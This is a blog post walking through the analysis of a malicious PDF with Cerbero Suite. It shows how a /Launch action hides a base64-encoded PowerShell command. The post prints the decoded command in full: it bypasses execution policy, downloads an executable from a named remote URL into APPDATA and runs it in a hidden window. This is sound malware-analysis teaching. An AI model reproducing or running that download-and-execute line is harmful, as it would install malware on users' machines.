Reversing Malicious Document PDF

Hi Fellow Friends,

Finally, I can write this blog space again after sometimes focusing on another thing. Today, I would like to write about reversing malicious PDF to get detailed information of what it is trying to do with our endpoint

Many tools could help you during analysis, but today I will use one integrated tool for file analysis called Cerbero Suite Advance. I love this application because it gives the most functionality to do file analysis

Let’s get started. Let’s open the malware sample by right-clicking on it and analyze it with Cerbero

Cerbero can fully parse PDF data structure and show them in a structured way. We can see in the image below that cerbero will directly give you hints that the application has a threat inside.

We can see that the PDF file has five objects. We can start to analyze the file start from object number one. We can select the object from the format windows.

Cerbero will give you information about the object in the raw data window

We can understand that this object does /Launch/Win action when the document is opened. It is shown that the pdf will start the PowerShell command with base64 encoding.

We can also see the hierarchy of the object in the tree tab like shown below, which is more clearer

To do further analyses for what command will run, we can copy the item and paste it to the text analysis window.

And open a new text window for analysis. We can see that the PowerShell will execute encoded command with window style hidden. It is suspicious, right.

Let’s start decoding the PowerShell command with base64. It is straightforward to crack it with cerbero. You can select the base64 encoded text and press CTRL+R, and select Base64 to bytes

it will show you the result in the hexstring window

here is the full code command execution that the powershell trigger on start

PowerShell -ExecutionPolicy bypass -noprofile -windowstyle hidden -command (New-Object SystemNetWebClient)DownloadFile(‘http://ncdugandaorg/css/aworiexe’, $env:APPDATA\aworiexe );Start-Process ( $env:APPDATA\aworiexe )

Now we can understand that the powershell will download the malware from http://ncdugandaorg/css/aworiexe and execute it in hidden window.

i would like to encourage the malware analyst to use cerbero to do file analysis. it has various feature that make your life easier


    1. There are certain PDF reader that has vulnerability on parsing/reading the data in the PDF files so that it can be exploited to do RCE. There are also some built-in functionality of the PDF that can be used to run malicious script

Leave a Reply

Fill in your details below or click an icon to log in: Logo

You are commenting using your account. Log Out /  Change )

Facebook photo

You are commenting using your Facebook account. Log Out /  Change )

Connecting to %s